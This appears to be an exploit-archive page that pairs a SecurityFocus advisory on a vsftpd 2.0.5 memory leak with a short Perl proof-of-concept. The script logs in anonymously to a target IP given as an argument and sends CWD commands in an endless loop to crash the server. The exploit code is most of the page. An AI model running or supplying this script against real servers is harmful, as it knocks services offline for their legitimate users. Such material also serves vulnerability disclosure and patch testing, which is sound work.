40 lines
No EOL
1.3 KiB
Perl
Executable file
40 lines
No EOL
1.3 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/29322/info
|
|
|
|
|
|
The 'vsftpd' FTP server is prone to a remote denial-of-service vulnerability because it fails to free allocated memory.
|
|
|
|
Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.
|
|
|
|
#!/usr/bin/perl -w
|
|
|
|
|
|
#######################################################################################
|
|
#vsftpd 2.0.5 FTP Server on Red Hat Enterprise Linux (RHEL) 5, Fedora 6 to 8,
|
|
#Foresight Linux, rPath Linux is prone to Denial-of-Service(DoS) vulnerability.
|
|
#
|
|
#Can be xploited by large number of CWD commands to vsftp daemon with deny_file configuration
|
|
#option in /etc/vsftpd/vsftpd.conf or the path where FTP server is installed.
|
|
#
|
|
#I tried to modify local exploit found at securityfocus such that we can remotely exloit
|
|
#
|
|
# Author shall not bear any responsibility
|
|
#Author:Praveen Darshanam
|
|
#Email:praveen[underscore]recker[at]sify.com
|
|
#Date:07th June, 2008
|
|
#
|
|
#
|
|
########################################################################################
|
|
|
|
|
|
use Net::FTP;
|
|
$ftp=Net::FTP->new("$ARGV[0]",Debug=>0) || die "Cannot connect to Host $ARGV[0]\n Usage: $perl script_name.pl target_ip\n";
|
|
$ftp -> login("anonymous","anonymous") || die "Could not Login...Retry";
|
|
|
|
while(1)
|
|
{
|
|
#this loop runs infinitely
|
|
|
|
$ftp -> cwd();
|
|
}
|
|
|
|
$ftp->quit; |